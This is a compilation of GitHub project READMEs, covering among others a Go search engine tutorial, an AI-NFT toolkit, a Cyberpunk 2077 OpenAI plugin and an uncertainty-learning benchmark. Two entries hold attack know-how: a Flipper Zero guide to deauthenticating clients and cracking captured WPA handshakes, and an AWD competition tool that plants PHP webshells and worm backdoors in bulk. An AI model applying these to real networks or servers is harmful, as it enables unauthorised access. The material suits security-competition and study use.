字典的值中`-`出现的次数 NQi := len(partsArr) // 得出相关性权重 IDF := math.Log10((float64(N-NQi) + 0.5) / (float64(NQi) + 0.5)) ``` #### 某个词和包含它的某个页面的“相关性得分” ![](https://qn.lvwenhan.com/2023-06-30-16880570104402.jpg) 这个表达式看起来是不是很复杂,但是它的复杂度是为了处理查询语句里面某一个关键词出现了多次的情况,例如“八百标兵奔北坡,炮兵并排北边跑。炮兵怕把标兵碰,标兵怕碰炮兵炮。”,“炮兵”这个词出现了 3 次。为了能快速实现一个能用的搜索引擎,我们放弃支持这种情况,然后这个看起来就刺激的表达式就可以简化成下面这种形式: ![](https://qn.lvwenhan.com/2023-06-30-16880571028529.jpg) 需要注意的是,这里面的大写的 K 依然是上面那个略微复杂的样式。我们取 k1 为 2,b 为 0.75,页面(文档)平均长度我自己跑了一个,13214,你们可以用我这个数,也可以自己跑一个用。 我的代码实现如下: ```go // 使用 - 切分后的值,为此页面的字典值,形式为: // 110,85,1,195653,7101 ints := strings.Split(p, ",") // 这个词在这个页面中出现总次数 Fi, err := strconv.Atoi(ints[2]) // 这个页面的长度 Dj, _ := strconv.Atoi(ints[3]) k1 := 2.0 b := 0.75 // 页面平均长度 avgDocLength := 13214.0 // 得到相关性得分 RQiDj := (float64(Fi) * (k1 + 1)) / (float64(Fi) + k1*(1-b+b*(float64(Dj)/avgDocLength))) ``` #### 怎么样,是不是比你想象的简单? ### 检验搜索结果 我在我搞的“翰哥搜索”页面上搜了一下“BM25 算法的数学描述”,结果如下: ![](https://qn.lvwenhan.com/2023-07-04-16884473624549.jpg) 我搜索“住范儿”,结果如下: ![](https://qn.lvwenhan.com/2023-06-30-16880596117906.jpg) 第一个就是我们官网,可以说相当精准了。 看起来效果还不错,要知道这只是在 784 万的网页中搜索的结果哦,如果你有足够的服务器资源,能搞定三亿个页面的爬取、索引和查询的话,效果肯定更加的好。 ### 如何继续提升搜索准确性? 目前我们的简化版 BM25 算法的搜索结果已经达到能用的水平了,还能继续提升搜索准确性吗?还可以: 1. 本文全部是基于分词做的字典,你可以再做一份基于单字的,然后把单字的搜索结果排序和分词的搜索结果进行结合,搜索结果可以更准。 2. 相似的原理,打造更加合理、更加丰富的分词方式,构造不同倾向的词典,可以提升特定领域的搜索结果表现,例如医学领域、代码领域等。 3. 打造你自己的 PageRank 技术,从 URL 之间关系的角度,给单个 URL 的价值进行打分,并将这个价值分数放进搜索结果的排序参数之中。 4. 引入 proximity 相似性计算,不仅考虑精确匹配的关键词,还要考虑到含义相近的关键词的搜索结果。 5. 特殊查询的处理:修正用户可能的输入错误,处理中文独特的“拼音匹配”需求等。 ### 参考资料 1. 【NLP】非监督文本匹配算法——BM25 https://zhuanlan.zhihu.com/p/499906089 2. 《自制搜索引擎》—— [日]山田浩之、末永匡 文章结束了,你学废了吗?欢迎到下列位置留下你的评论: 1. Github:https://github.com/johnlui/DIY-Search-Engine 2. 博客:https://lvwenhan.com/tech-epic/509.html 【全文完】 <hr> # 本项目运行方法 首先,给自己准备一杯咖啡。 1. 把本项目下载到本地 2. 编译:`go build -o ese *.go` 3. 修改配置文件:`cp .env.example .env`,然后把里面的数据库和 Redis 配置改成你的 4. 执行`./ese art init`创建数据库 5. 手动插入一个真实的 URL 到 pages_00 表中,只需要填充 url 和 host 两个字段 6. 执行`./ese`,静待好事发生 ☕️ 过一段时间,等字典数据表`word_dics`里面填充了数据之后,打开[http://127.0.0.1:10086](http://127.0.0.1:10086),尝试搜一下吧!🔍 #### 更多项目运行信息,请见 [wiki](https://github.com/johnlui/DIY-Search-Engine/wiki) #### 网页直接阅读:https://lvwenhan.com/tech-epic/509.html ### 作者信息: 1. 姓名:吕文翰 2. GitHub:[johnlui](https://github.com/johnlui) 3. 职位:住范儿 CTO ![公众号](https://lvwenhan.com/content/uploadfile/202301/79c41673579170.jpg) ### 文章版权声明 本文权归属于[吕文翰](https://github.com/johnlui),采用 [CC BY-NC-ND 4.0](https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.zh-Hans) 协议开源,供 GitHub 平台用户免费阅读。 <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.zh-Hans"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc-nd/4.0/88x31.png" /></a> ### 代码版权 本项目代码采用 MIT 协议开源。
aigenprotocol/aigen
https://github.com/aigenprotocol/aigen
Aigen's open-source implemenation of various tools to create AINFTs effortlessly
<div align="center"> <img src="https://aigenprotocol.com/static/media/aigen-logo-light.fad5403b0fa280336867e8ea8400db40.svg" /> <h3> Aigen's open-source tools to create AINFTs effortlessly </h3> </div> ### create environment variables #### create a .env file and put these variables ``` ACCOUNT_ADDRESS=0x0000000000000000000000000000000000000000 PRIVATE_KEY=000000000000000000000000000000000000000000000000000000000000000 AINFT_CONTRACT_ADDRESS=0x000000000000000000000000000000000000 PROVIDER_URL=http://0.0.0.0:8545 NFTSTORAGE_TOKEN=<NFTStorage Token> MODELS_DIR=/Users/apple/aigen ``` ### compile & deploy AINFTToken.sol smart contract The smart contract can be found at contracts->AINFTToken.sol ##### compile ``` npm run compileAINFTTokenContract ``` #### deploy ``` npm run deployAINFTTokenContract ``` this will automatically deploy the smart contract to 'PROVIDER_URL' Note: * Using Remix IDE, deploy the smart contract to the local Ganache or Goerli testnet. * It is recommended that you test the smart contract before deploying it to the mainnet. ### commands #### install python dependencies ``` pip install -r requirements ``` #### extract model weights and create shards in a single command ``` python main.py --action "create_shards" -n "test" -m "<path-to-model.h5>" -no 20 ``` provide model name, model path and no of ainfts to create * For the time being, we only support Keras models ### code ### extract and save model weights ``` from ai import save_model save_model(model_name=model_name, model_dir=MODELS_DIR, model_path=model_path) ``` provide model name and local model path to start extracting weights ### create shards of model weights ``` from ai import create_shards create_shards(model_name=model_name, model_dir=MODELS_DIR, no_of_ainfts=no_of_ainfts) ``` provide model name and no of ainfts to create. This function will automatically create shards from model weights ### install node dependencies ``` npm install or yarn ``` ### mint ainfts ``` npm run ainft --action="createAINFT" --model_name="Test" --model_dir="/Users/apple/aigen/test" ``` this step will deploy files to NFTStorage and mint AINFTs ### download AINFTs ``` npm run ainft --action=downloadAINFT --model_name=test --model_dir="/Users/apple/aigen/test" ``` this will automatically download and decrypt content of AINFTs ### merge model shards ``` python main.py --action "merge_shards" --name test ``` this will merge shards back to recover the original weight files ### load model (keras) ``` python main.py --action "load_model" --name test ``` this will load model from merged shards ## License <a href="LICENSE.rst"><img src="https://img.shields.io/github/license/aigenprotocol/aigen"></a> This project is licensed under the MIT License - see the [LICENSE](LICENSE.rst) file for details
efenatuyo/xolo-sniper-recode
https://github.com/efenatuyo/xolo-sniper-recode
decided to fully rewrite the code to make the ugc sniper faster
# xolo-sniper-recode decided to fully rewrite the code to make the ugc sniper faster
grugnoymeme/flipperzero-GUI-wifi-cracker
https://github.com/grugnoymeme/flipperzero-GUI-wifi-cracker
GUI - Analyze WPA/WPA2 handshakes from FlipperZero's captured .pcaps to find out the WiFi Passwords.
# (flipperzero)-GUI-wifi-cracker Would you like to be able to extract WPA/WPA2 handshakes from FlipperZero's captured .pcap files, and analyze them with hashcat, and find out passwords JUST IN ONE CLICK? This is the GUI (Graphic User Interface) version of my other script and repo [`flipperzero-CLI-wifi-cracker`](https://github.com/grugnoymeme/flipperzero-CLI-wifi-cracker), i just wanted to make the process easyest as possible, and this is the result. --- ## Extarcion of .pcap file. You can automatize the extraction of .pcap files from flipper zero, using the [@0xchocolate](https://github.com/0xchocolate) 's companion app, of the [@JustCallMeKoKo's](https://github.com/justcallmekoko) ESP32marauder. Once you've connected the devboard and opened the app,follow these instructions: ``` Menu Apps WIFI / GPIO / GPIO EXTRA [ESP32] WiFi Marauder Scripts [+]ADD SCRIPT < Enter a name for your script > Save < Select your script > [+]EDIT STAGES [+]ADD STAGE [+]Deauth < Select Deauth > Timeout 1 Save Back [+]ADD STAGE [+]Sniff RAW < Select Sniff RAW > Timeout 15 (or 10, maybe also 5 is ok) Save Back Back [*]SAVE ``` --- # Disclaimer This tool is not developed by the Flipper Zero staff. Please note that the code you find on this repo is only proposed for educational purposes and should NEVER be used for illegal activities.
kirillkuzin/cyberpunk2077ai
https://github.com/kirillkuzin/cyberpunk2077ai
🤖CyberAI is designed to bridge the world of Cyberpunk 2077 and the power of OpenAI's AI technology.
# CyberAI :robot: Welcome to the CyberAI project! This plugin for Cyberpunk 2077 enables integration between the videogame and OpenAI API, opening a world of possibilities for enhancing the gameplay experience. With this plugin, you can call OpenAI API methods directly from the scripting level. Plugin development is still in progress. :construction: ![bg](bg.png) ## Installation :wrench: 1. Download the zip from the latest release 2. Move CyberAI.dll and Settings.json to red4ext\plugins\CyberAI 3. Open Settings.json and paste your OpenAI API key and organization id 4. If you would access to the plugin's functions from CET console, you need to move CyberAI.reds to r6\scripts\CyberAI ## Usage :computer: ### Redscript Ask GPT to generate an answer for you: ``` native func ScheduleChatCompletionRequest(chat_id: String, messages: array<array<String>>); ScheduleChatCompletionRequest("your_custom_id", {{"System", "Speak as ..."}, {"User", "How are you?"}}); ScheduleChatCompletionRequest("your_custom_id", {{"User", "My name is V"}, {"User", "How are you and what's my name?"}}); ``` You can collect your request and an answer when it is done: ``` native func GetAnswer(chat_id: String) -> String; native func GetRequest(chat_id: String) -> String; LogChannel(n"DEBUG", GetAnswer("your_custom_id")); LogChannel(n"DEBUG", GetRequest("your_custom_id")); ``` You can iterate through the chat history, or you can get it as a string: ``` native func GetHistory(chat_id: String) -> array<array<String>>; native func GetHistoryAsString(chat_id: String) -> String; LogChannel(n"DEBUG", GetHistoryAsString("your_custom_id")); let history = GetHistory(chat_id); for completion in history { LogChannel(n"DEBUG", "Role: " + ToString(completion[0]) + "\nMessage: " + ToString(completion[1])); } ``` Flushing a chat: ``` native func FlushChat(chat_id: String); FlushChat("your_custom_id"); ``` You need to put your generated custom string ID in almost all functions. CyberAI will provide a new chat for every unique ID and keep the chat history. :warning: <b>Whenever you request to chat, all the chat history also sends to OpenAI API.</b> ## Future Plans :rocket: - **Eleven Labs Integration:** We plan to integrate with Eleven Labs to provide text-to-speech functionality, allowing the AI to generate audio responses in addition to text. - **InWorld AI Integration:** We are exploring the possibility of integrating with InWorld AI, a powerful AI engine for creating characters. This could allow for even more dynamic and responsive AI characters in the game. ## Inspiration :bulb: With this plugin, the possibilities are almost limitless. Here are just a few examples of what you can script with it: - **AI-NPC Dialogue:** Use OpenAI's GPT to generate unique dialogue for non-player characters (NPCs), increasing the diversity and richness of in-game interactions. - **Dynamic Plot Generation:** Use OpenAI to generate unique storylines or side quests based on in-game events or player actions. - **Procedural Mission Planning:** Generate procedural missions based on context, NPC data, and player preferences using AI. - **Interactive Environment**: Use AI to generate dynamic responses from the environment, making your exploration of Night City even more immersive. - **Intelligent Enemy Tactics:** AI could control enemy tactics based on the player's strategy and actions, making combat more challenging and unpredictable. Remember, these are just examples, and the only limit is your imagination! ## Credits :link: This project would not be possible without the following projects: - [red4ext-rs](https://github.com/jac3km4/red4ext-rs): A Rust binding for RED4ext, which provides an API to interact with the internals of Cyberpunk 2077. - [async-openai](https://github.com/64bit/async-openai): An asynchronous, modern Rust library for OpenAI API. - [OpenAI API](https://openai.com/blog/openai-api): OpenAI offers a general-purpose "text in, text out" interface, making it possible to use language models like GPT-3 in a wide range of applications. ## License :bookmark: This project is licensed under the terms of the MIT License. See the LICENSE file in the project's root directory for more details. Enjoy exploring the new world of Cyberpunk 2077 with the power of AI! :video_game: :joystick: ---
AQF0R/FUCK_AWD_TOOLS
https://github.com/AQF0R/FUCK_AWD_TOOLS
AWD
# 前言 ## 欢迎关注微信公众号:朱厌安全团队 感谢支持! ### 一个面向AWD竞赛的工具,目前BUG和待优化点可能会较多,请谅解!!! 欢迎师傅们提出本工具宝贵建议,如有BUG欢迎师傅们向我们反馈,我们会第一时间关注! ### 工具也会持续维持,后面会更新新模块,敬请期待! # 工具介绍 FUCK_AWD工具cmd运行命令:python fuck_awd_main.py 即可 如果CMD颜色乱码可以解压 ansi189-bin.zip 运行对应电脑兼容的版本 cmd命令ansicon.exe -i 工具攻击模块原理是以马上马,所以使用时要确认好场景! 利用前提条件:目标服务器没有过滤system()函数、有写入权限、目标为PHP网站 攻击模块:工具目前支持单一目标,批量目标攻击、批量执行命令、预设置三种类型后门木马提供选择(一句话/不死马/蠕虫马),执行完毕批量保存执行结果、非自定义/自定义后门存活监测等。 防御模块:支持目录树生成、文件一键备份、文件监控、PHP文件数目检测、PHP危险函数检测、一键PHP文件上WAF等。 # 工具效果 ![图片](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/45d8f3c6-fd49-4762-a3d9-f50d2acb72c1) ![图片](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/a31e5939-b471-423f-9283-7ba5e311fe12) ![图片](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/c3bd87db-e46d-44fb-b243-8296509d1768) ![图片](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/5b895f1f-1bb2-49a5-9a4c-db31917de88f) ![图片](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/0c175494-5e27-47e9-ae32-355dcf38f6b1) ![图片](https://github.com/AQF0R/FUCK_AWD_TOOLS/assets/120232326/b0f95d57-26ba-49af-a76a-b2d687f66761) ## 拓展知识 内存马查杀: 1.ps auxww|grep shell.php 找到pid后杀掉进程就可以,你删掉脚本是起不了作用的,因为php执行的时候已经把脚本读进去解释成opcode运行了 2.重启php等web服务 3.用一个ignore_user_abort(true)脚本,一直竞争写入(断断续续)。usleep要低于对方不死马设置的值。 4.创建一个和不死马生成的马一样名字的文件夹。 修改curl: alias curl='echo fuckoff' 较低权限 chmod -x curl 较高权限 /usr/bin curl路径 apache日志路径: /var/log/apache2/ /usr/local/apache2/logs
xun082/online-cooperative-edit
https://github.com/xun082/online-cooperative-edit
一个基于 webrtc 实现的在线协同编辑器
### Compiles and hot-reloads for development ``` npm start ``` ### Compiles and minifies for production ``` npm run build ``` This is the official base template for [Create Neat](https://github.com/xun082/react-cli). For more information, please refer to: - [Getting Started](https://github.com/xun082/react-cli) – How to create a new app.
ytdl-org/ytdl-nightly
https://github.com/ytdl-org/ytdl-nightly
Nightly builds for youtube-dl.
[![Build Status](https://github.com/ytdl-org/youtube-dl/workflows/CI/badge.svg)](https://github.com/ytdl-org/youtube-dl/actions?query=workflow%3ACI) **This repository is for youtube-dl nightly builds.** youtube-dl - download videos from youtube.com or other video platforms - [INSTALLATION](#installation) - [DESCRIPTION](#description) - [MORE INFORMATION](#more-information) - [COPYRIGHT](#copyright) # INSTALLATION These instructions are specific to this nightly release repository. Refer to the [installation instructions](https://github.com/ytdl-org/youtube-dl#installation) for the main repository (the "main instructions" below) for guidance on * the types of installation available * installation methods and command lines to adapt for each installation type. Find the appropriate build to install in the [Releases](https://github.com/ytdl-org/ytdl-nightly/releases) page here, rather than the URLs mentioned in the main instructions. Replace the download URL in the appropriate command line shown in the main instructions with the URL from the Releases page. These nightly releases are not available through package managers like _brew_. # DESCRIPTION **youtube-dl** is a command-line program to download videos from YouTube.com and a few more sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and it is not platform specific. It should work on your Unix box, on Windows or on macOS. It is released to the public domain, which means you can modify it, redistribute it or use it however you like. youtube-dl [OPTIONS] URL [URL...] # MORE INFORMATION For **more information**, or to **raise a support issue**, visit [the main site](https://github.com/ytdl-org/youtube-dl). Please contribute any pull requests at the main site as well, unless the change is specific to this nightly repository (eg, workflow improvements). # COPYRIGHT youtube-dl is released into the public domain by the copyright holders. This README file is likewise released into the public domain.
shemmee/TikTok-UI-Clone
https://github.com/shemmee/TikTok-UI-Clone
This is a TikTok UI Clone that replicates the TikTok feed and its elements, including smooth video scrolling. Explore an interactive interface similar to Tiktok and enjoy a seamless browsing experience.
# TikTok UI Clone The TikTok UI Clone is a web application developed to replicate the user interface of the TikTok app. It is built using React.js, CSS, and JSX, and allows users to browse and view TikTok-style videos in a familiar and interactive interface. # Features - Browse and view TikTok-style videos. - Smooth and responsive video playback. - User-friendly interface with intuitive navigation. - Infinite scrolling for seamless video discovery. - Like, comment, and share videos. - Follow users and explore personalized content. # Technologies & Tools Used - React.js - CSS - JSX - VS Code # Installation and Usage To use this TikTok UI Clone, follow these steps: - Clone the repository or download the source code. - Open the project in your preferred code editor. - Run `npm install` to install the necessary dependencies. - Run `npm start` to start the development server. - Open your browser and navigate to `http://localhost:3000` to access the app. # Demo A live demo of the TikTok UI Clone is available at [LINK TO LIVE DEMO](https://tik-tok-ui-clone-shemmee.vercel.app). # Credits The TikTok UI Clone was created by [s-shemmee](https://github.com/s-shemmee). # License This project is licensed under the MIT license.
mkirchhof/url
https://github.com/mkirchhof/url
Uncertainty-aware representation learning (URL) benchmark
# URL: A Representation Learning Benchmark for <br> Transferable Uncertainty Estimates Michael Kirchhof, Bálint Mucsányi, Seong Joon Oh, Enkelejda Kasneci ![URL Benchmark](plots/benchmark.png) _Representation learning has driven the field to develop pretrained models that generalize and transfer to new datasets. With the rising demand of reliable machine learning and uncertainty quantification, we seek pretrained models that output both an embedding and an uncertainty estimate, even on unseen datasets. To guide the development of such models, we propose the uncertainty-aware representation learning (URL) benchmark. It measures whether the uncertainty predicted by a model reliably reveals the uncertainty of its embedding. URL takes only four lines of code to implement but still has an information-theoretical backbone and correlates with human-perceived uncertainties. We apply URL to study ten large-scale uncertainty quantifiers that were pretrained on ImageNet and transfered to eight downstream datasets. We find that transferable uncertainty quantification is an unsolved open problem, but that it appears to be not at stakes with classical representation learning._ **Link**: [arxiv.org/abs/2307.03810](https://www.arxiv.org/abs/2307.03810) --- ## Installation **TL;DR:** Create a conda environment with ```conda env create -f requirements.yml```, then [download the datasets](#datasets). ### Conda environment Long answer: First, install Python 3.8.8 and PyTorch 1.10 with a CUDA backend that suits your GPU (in this case, CUDA 11.1) ``` pip install python=3.8.8 conda install pytorch==1.13.0 torchvision==0.14.0 torchaudio==0.13.0 pytorch-cuda=11.7 -c pytorch -c nvidia ``` Then, install the dependencies: ``` pip install matplotlib pyyaml huggingface_hub safetensors>=0.2 scipy==1.7.1 argparse==1.4.0 tueplots==0.0.5 wandb==0.13.5 torchmetrics==0.11.3 scikit-learn==0.24.1 pandas==1.2.4 conda install -c pytorch faiss-gpu ``` ### Datasets Now, download all datasets. The scripts search for them by default under ```./data```. You can adjust this via the arguments ```--data-dir``` for the upstream (ImageNet) dataset, ```--data-dir-downstream``` for the zero-shot downstream and further downstream datasets, and ```--real-labels``` and ```--soft-labels``` for the auxiliary ImageNet-RealH files. If your downstream datasets are spread over multiple directories, consider providing one folder that gives symlinks to them. Upstream dataset: [ImageNet-1k](https://www.image-net.org/download.php) ImageNet-RealH files: [raters.npz](https://github.com/google-research/reassessed-imagenet/blob/master/raters.npz) and [real.json](https://github.com/google-research/reassessed-imagenet/blob/master/real.json) Downstream datasets: [CUB200-211](https://www.dropbox.com/s/tjhf7fbxw5f9u0q/cub200.tar?dl=0), [CARS196](https://www.dropbox.com/s/zi2o92hzqekbmef/cars196.tar?dl=0), [Stanford Online Products](https://www.dropbox.com/s/fu8dgxulf10hns9/online_products.tar?dl=0) Further downstream datasets: [CIFAR-10H, Treeversity#1, Turkey, Pig, Benthic](https://doi.org/10.5281/zenodo.7152309) Please verify that your folder structure for the downstream datasets looks like this (note the folder names for each dataset): ``` cub200 └───images | └───BMW 3 Series Wagon 2012 | │ 00039.jpg | │ ... | ... cars196 └───images | └───001.Black_footed_Albatross | │ Black_Footed_Albatross_0001_796111.jpg | │ ... | ... online_products └───images | └───bicycle_final | │ 111085122871_0.jpg | ... | └───Info_Files | │ bicycle.txt | │ ... ``` The further downstream datasets should look like this directly after unzipping ``` CIFAR10H/Treeversity#1/Turkey/Pig/Benthic └───fold1 | │ 182586_00.png | ... └───annotations.json ``` --- ## Training and Benchmarking your own Method Training happens in ```train.py```. This is adapted from the ```timm``` library, including all its models, to which we added various uncertainty output methods, so that all models have outputs of the form ```class_logits, uncertainties, embeddings = model(input)```. The best starting point to implement your own ideas would be to adapt the uncertainty output methods in ```./timm/models/layers/_uncertainizer.py```, implement losses in ```./timm/loss```, or enhance model architectures in ```./timm/models```. The URL benchmark is evaluated in ```validate.py```, which is called during training, but can also be used stand-alone if you prefer to train with your own code. An exemplary call would be ``` train.py --model=resnet50 --loss=elk --inv_temp=28 --unc-module=pred-net --unc_width=1024 --ssl=False --warmup-lr=0.0001 --lr-base=0.001 --sched=cosine --batch-size=128 --accumulation_steps=16 --epochs=32 --seed=1 --eval-metric avg_downstream_auroc_correct --log-wandb=True --data-dir=./data/ImageNet2012 --data-dir-downstream=./data --soft-labels=./data/raters.npz --real-labels=./data/real.json ``` The most important parameters are: * ```--model``` Which backbone to use. In our paper, we use ```resnet50``` and ```vit_medium_patch16_gap_256```. * ```--loss``` Which loss to use. Note that some approaches, like MCDropout, use a ```cross-entropy``` loss, but specify other parameters to make them into their own loss. Please refer to the example codes below. * ```--inv_temp``` The hyperparameter constant the distances in the softmax exponentials are multiplied by. This can also be understood as the inverse of the temperature. Some approaches require further hyperparameters. Please refer to the example codes below. * ```--unc-module``` How to calculate the uncertainty attached to each embedding. Popular choices are an explicit ```pred-net``` module attached to the model or the ```class-entropy``` of the predicted upstream class label distribution. These uncertainty modules are implemented as wrappers around the models, so that any combination of model backbone and uncertainty method should work. * ```--unc_width``` If ```--unc-module=pred-net```, this gives the width of the 3-layer MLP to estimate uncertainties. * ```--ssl``` Set to ```False``` if you want to learn with supervised labels and to ```True``` if you want to learn from self-supervised contrastive pairs. Note that these result in different data formats, such that not all losses are compatible with all settings. Please refer to the example codes below. * ```--warmup-lr``` The fixed learning rate to use in the first epoch. Usually lower than the learning rate in later epochs. * ```--lr-base``` The learning rate in reference to a batchsize of 256. This will be increased/decreased automatically if you use a smaller or bigger total batchsize. The current learning rate will be printed in the log. * ```--sched``` Which learning rate scheduler to use. In the paper we use ```cosine``` annealing, but you may want to try out ```step```. * ```--batch-size``` How many samples to process at the same time. * ```--accumulation_steps``` How many batches to calculate before making one optimizer step. The accumulation steps times the batch size gives the final, effective batchsize. Loss scalers adjust to this automatically. * ```--epochs``` Number of epochs to train for on the upstream dataset. Since we automatically start from pretrained checkpoints, this is set to ```32``` by default. * ```--seed``` For final results, we replicate each experiment on the seeds ```1, 2, 3`` * ```--eval-metric``` Which metric to select the best epoch checkpoint by. We use ```avg_downstream_auroc_correct``` for the R-AUROC averaged across all downstream validation sets. These options here are the internal keys of the results dictionaries, as further detailed below. Keep in mind that the an ```eval_``` is prepended to the metric name internally, as we only allow to use metrics on the valiation splits to be used as ```eval-metric```. * ```--log-wandb``` We recommend to set this to ```True``` to log your results in W&B. Don't forget to login with your API key. * ```--data-dir``` Folder where ImageNet, or in general your upstream dataset, is stored. * ```--data-dir-downstream``` Folder where **all** CUB200, CARS196, SOP, CIFAR10H, ..., are stored, or whichever downstream and further downstream datasets you use. * ```--soft-labels``` and ```--real-labels``` Links to your ImageNet-Real H ```raters.npz``` and ```real.json``` files. --- ## Metrics **TL;DR:** The R@1 and R-AUROC metrics reported in the paper are internally named ```best_test_avg_downstream_r1``` and ```best_test_avg_downstream_auroc_correct```. During hyperparameter tuning, please use them on their validation sets, i.e., ```best_eval_avg_downstream_r1``` and ```best_eval_avg_downstream_auroc_correct```. **Long answer:** All metrics are named as follows: ``` <best/current epoch>_<dataset>_<metric> ``` , e.g., ```best_eval_avg_downstream_auroc_correct``` or ```eval_r1```. * ```<best/current epoch>``` We prepend a ```best_``` if the metric is computed on the best so-far epoch. The best epoch is chosen via ```--eval-metric```, see above. If nothing is prepended, this is just the metric of the current epoch. * ```<dataset>``` gives which dataset and eval/test split the metric is computed on. Options are * ```eval``` The validation set given in ```--dataset_eval```, which is usually just the same as the upstream loader, i.e., ```torch/imagenet``` or ```soft/imagenet```. * ```eval_avg_downstream``` The average across the validation sets of all downstream loaders. They are defined via ```--dataset-downstream```. * ```test_avg_downstream``` The average across the test sets of all downstream loaders. They are defined via ```--dataset-downstream```. * ```furthertest_avg_downstream``` The average across the test sets of all "further" downstream loaders. They are defined via ```--further-dataset-downstream```. This is essentially just a second set of datasets to test on. * ```eval_repr/cub```, ```test_repr/cub```, ```furthertest_soft/benthic```, ..., The results on each individual dataset. This is done for all datasets in ```--dataset-downstream``` and ```--further-dataset-downstream```. * ```<metric>``` Which metric we evaluate: * ```auroc_correct``` This is the R-AUROC from the paper main text. This is the main metric we focus on. * ```r1``` The R@1 from the paper main text. This is the second most important metric. * ```top1``` and ```top5``` The top-1 and top-5 accuracy of the classifier. This only makes sense on the upstream dataset (it is output aswell for downstream datasets just for modularity reasons). * ```croppedHasBiggerUnc``` How often a cropped version of an image has a higher uncertainty than the original version. * ```rcorr_crop_unc``` Rank correlation between how much we cropped an image and high uncertainty the model outputs. _Use with care!_ This is only implemented in reference to previous works. This metric only makes sense if all images show a single object, such that the amount of cropping has a roughly equal effect across all images. ```croppedHasBiggerUnc``` fixes this issue and should be preferred. * ```rcorr_entropy``` The rank correlation with the entropy of human soft label distributions. Only available for ```soft/...``` datasets. * ```min_unc```, ```avg_unc```, and ```max_unc``` The minimum, average, and maximum uncertainties across the dataset. --- ## Reproducing our Implemented Methods Below are the calls to reproduce the URL benchmark results on all ten baseline approaches, both on ResNet and ViT backbones. They all use the best hyperparameters we found in our searches. All approaches in the paper were repeated on seeds 1, 2, and 3, which we do not show here for brevity. ### Cross Entropy ``` train.py --inv_temp=31.353232263344143 --loss=cross-entropy --lr-base=0.0027583475549166764 --model=resnet50 --unc-module=class-entropy --unc_start_value=0 ``` ``` train.py --img-size=256 --inv_temp=60.70635770117517 --loss=cross-entropy --lr-base=0.004954014361368407 --model=vit_medium_patch16_gap_256 --unc-module=class-entropy --unc_start_value=0 ``` ### InfoNCE InfoNCE requires ```--ssl=True```, and a lower batchsize, since we forward two self-supervised crops per image. ``` train.py --accumulation_steps=21 --batch-size=96 --inv_temp=15.182859908025058 --loss=infonce --lr-base=0.0004452562693472003 --model=resnet50 --ssl=True --unc-module=embed-norm --unc_start_value=0 ``` ``` train.py --accumulation_steps=21 --batch-size=96 --img-size=256 --inv_temp=20.82011649785067 --loss=infonce --lr-base=0.006246538808281836 --model=vit_medium_patch16_gap_256 --ssl=True --unc-module=embed-norm --unc_start_value=0 ``` ### MCInfoNCE MCInfoNCE requires ```--ssl=True```, and a lower batchsize, since we forward two self-supervised crops per image. The MC sampling MCInfoNCE adds over InfoNCE did not significantly impact runtime or memory usage. ``` train.py --accumulation_steps=21 --batch-size=96 --inv_temp=52.43117045513681 --loss=mcinfonce --lr-base=2.384205225724591e-05 --model=resnet50 --ssl=True --unc-module=pred-net --unc_start_value=0.001 --warmup-lr=3.487706876306753e-05 ``` ``` train.py --accumulation_steps=21 --batch-size=96 --img-size=256 --inv_temp=50.27568453131382 --loss=mcinfonce --lr-base=0.0031866603949435874 --model=vit_medium_patch16_gap_256 --ssl=True --unc-module=pred-net --unc_start_value=0.001 ``` ### Expected Likelihood Kernel (ELK) ``` train.py --inv_temp=27.685357549319253 --loss=elk --lr-base=0.008324452068209802 --model=resnet50 --unc-module=pred-net --unc_start_value=0 ``` ``` train.py --img-size=256 --inv_temp=56.77356863558765 --loss=elk --lr-base=0.009041687325778511 --model=vit_medium_patch16_gap_256 --unc-module=pred-net --unc_start_value=0 ``` ### Non-isotropic von Mises Fisher (nivMF) ``` train.py --inv_temp=10.896111351193488 --loss=nivmf --lr-base=0.00014942909398367403 --model=resnet50 --unc-module=pred-net --unc_start_value=0.001 ``` ``` train.py --img-size=256 --inv_temp=31.353232263344143 --loss=nivmf --lr-base=0.0027583475549166764 --model=vit_medium_patch16_gap_256 --unc-module=pred-net --unc_start_value=0.001 ``` ### Hedged Instance Embeddings (HIB) HIB has an additional hyperparameter ```--hib_add_const``` to shift its sigmoid. HIB requires lower batchsizes to prevent running out of VRAM. ``` train.py --accumulation_steps=21 --batch-size=96 --hib_add_const=2.043464396656407 --inv_temp=26.850376086478832 --loss=hib --lr-base=5.606607236666466e-05 --model=resnet50 --unc-module=pred-net --unc_start_value=0 --warmup-lr=2.2864937540918197e-06 ``` ``` train.py --accumulation_steps=43 --batch-size=48 --hib_add_const=-5.360730528719454 --img-size=256 --inv_temp=13.955844954616405 --loss=hib --lr-base=0.0005920448270870512 --model=vit_medium_patch16_gap_256 --unc-module=pred-net --unc_start_value=0 ``` ### Heteroscedastic Classifiers (HET-XL) HET-XL uses several hyperparameters, see the args in ```train.py```, most importantly the ```--rank_V``` of the covariance matrix and ```--c-mult```. HET-XL uses a standard cross-entropy loss, but a modified architecture, which you call via the ```--model``` argument. We've implemented this only for ResNet 50 and ViT Medium. It can also use either its covariance determinant or class entropy as ```--unc-module```. In our experiments, the latter outperformed the former. ``` train.py --c-mult=0.011311824684149863 --inv_temp=28.764754827923134 --loss=cross-entropy --lr-base=0.00030257136041070065 --model=resnet50hetxl --rank_V=1 --unc-module=class-entropy --unc_start_value=0 ``` ``` train.py --c-mult=0.011586882497402008 --img-size=256 --inv_temp=21.601079237861356 --loss=cross-entropy --lr-base=0.00012722151293115814 --model=vit_medium_patch16_gap_256hetxl --rank_V=1 --unc-module=hetxl-det --unc_start_value=0 ``` ### Direct Risk Prediction (Riskpred) Riskpred uses the ```--lambda-value``` hyperparameter to balance its cross entropy and uncertainty prediction loss. ``` train.py --inv_temp=27.538650119804444 --lambda-value=0.04137484664752506 --loss=riskpred --lr-base=0.00907673293373138 --model=resnet50 --unc-module=pred-net --unc_start_value=0 ``` ``` train.py --img-size=256 --inv_temp=29.83516046330469 --lambda-value=0.011424752423322174 --loss=riskpred --lr-base=0.0026590263551453507 